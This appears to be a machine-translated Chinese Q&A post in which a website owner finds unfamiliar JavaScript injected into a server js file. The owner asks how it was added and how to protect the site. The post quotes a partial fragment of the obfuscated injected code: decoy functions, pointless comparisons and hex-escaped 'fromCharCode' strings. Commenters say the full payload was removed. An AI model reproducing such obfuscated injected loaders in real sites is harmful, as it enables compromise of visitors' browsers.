在我的網站中,我在js文件中發現了一些JavaScript代碼,但從未添加到服務器上,而js文件沒有對用戶的寫入權限。在服務器上注入javascript代碼
任何有關如何更改此文件並在此添加代碼以及如何保護服務器上的網站以進行此類嘗試的可能性的任何想法。
這是javascript代碼的一部分,我不知道它是如何添加到我的文件中的。
var RPTj='hYUw';function HCLac(){}
if('hikbf'=='gloCBh')hnwT='BtbByu';var efIc;function ovPvyr(){var GcFza='sLHwL';if('jPslJ'=='WfPs')FgTgr();}
var px0_var="0\x70x";function yefdV(){var MZIWif='pFeEIR';if('Oqoi'=='jcEyCx')YXCIxm();}
var WxTv;var JJfPP="f\x72\x6fm\x43harCode";function MnFGT(){var WcZW='mpjU';if('GQike'=='hfiFQm')aSNa();}
var LusRYV="";if('KSCVlW'=='ZHLn')fCxfd='nkVIX';if('rGsiG'=='uRdOG')bgTeVq();function NmGQl(){}
它似乎是一些JS文件,它聲稱在MSIE中刪除填充! http://jsunpack.jeek.org/dec/go?report=4d7e564d602c57c80f4ef65ce5f55c120eb9cf02 –
@PraveenKumar:恩,沒有。 – ThiefMaster
Fyi,我刪除了完整的惡意代碼,因爲它現在並不重要,因爲我們知道它只是一個部分。 – ThiefMaster